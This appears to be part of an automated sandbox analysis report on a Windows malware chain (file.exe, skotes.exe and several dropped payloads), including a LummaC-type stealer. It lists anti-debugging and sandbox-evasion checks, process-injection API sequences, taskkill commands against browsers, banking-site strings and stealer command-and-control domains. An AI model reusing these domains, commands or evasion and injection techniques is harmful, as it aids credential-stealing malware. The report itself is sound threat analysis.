Source: chrome.exe, 00000010.00000002.3320144246.000002772C83B000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.3427460805.0000020C7CA43000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3421610394.00000269CDED3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: chrome.exe, 00000010.00000002.3321764592.00000277303A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVM
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: cd39094ad6.exe, 00000015.00000002.3230900745.000000000088E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware=e
Source: file.exe, 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmp, 2656cd82fe.exe, 0000000D.00000002.2881432053.0000000001213000.00000040.00000001.01000000.0000000B.sdmp, cd39094ad6.exe, 00000015.00000002.3233860179.0000000001271000.00000040.00000001.01000000.00000015.sdmp, cd39094ad6.exe, 00000022.00000002.3395888761.0000000001271000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: chrome.exe, 00000014.00000002.3309446765.00000257C8477000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3154286328.00000257C8476000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10536
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10595
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10021
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10056
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10038

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CD038E rdtsc

0_2_04CD038E

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 11_2_0043B480 LdrInitializeThunk,

11_2_0043B480

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 7_2_004E8077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_004E8077

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA652B mov eax, dword ptr fs:[00000030h]	0_2_00DA652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAA302 mov eax, dword ptr fs:[00000030h]	0_2_00DAA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FEA302 mov eax, dword ptr fs:[00000030h]	2_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FE652B mov eax, dword ptr fs:[00000030h]	2_2_00FE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FEA302 mov eax, dword ptr fs:[00000030h]	3_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FE652B mov eax, dword ptr fs:[00000030h]	3_2_00FE652B
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004FE1A9 mov edi, dword ptr fs:[00000030h]	7_2_004FE1A9
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E17D0 mov edi, dword ptr fs:[00000030h]	7_2_004E17D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E17D0 mov edi, dword ptr fs:[00000030h]	9_2_004E17D0

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 7_2_004E9E16 GetProcessHeap,

7_2_004E9E16

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E8077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004E8077
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E39E5 SetUnhandledExceptionFilter,	7_2_004E39E5
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E39F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004E39F1
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E2F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_004E2F82
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E8077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004E8077
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E39E5 SetUnhandledExceptionFilter,	9_2_004E39E5
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E39F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004E39F1
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E2F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_004E2F82

Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 8084, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 7_2_004FE1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

7_2_004FE1A9

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Memory written: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: debonairnukk.xyz
Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: diffuculttan.xyz
Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: effecterectz.xyz
Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deafeninggeh.biz
Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: immureprech.biz
Source: ccdb824191.exe, 0000000F.00000003.2989270999.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tacitglibbr.biz

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe "C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe "C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe "C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe "C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe "C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe "C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe "C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Process created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe "C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: 5cbc6b58d3.exe, 00000018.00000002.3365184052.0000000000692000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: )9LProgram Manager
Source: cd39094ad6.exe, 00000015.00000002.3233860179.0000000001271000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Z'VProgram Manager
Source: 2656cd82fe.exe, 2656cd82fe.exe, 0000000D.00000002.2881432053.0000000001213000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: #&Program Manager

Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016048001\6729f6ea15.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016048001\6729f6ea15.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
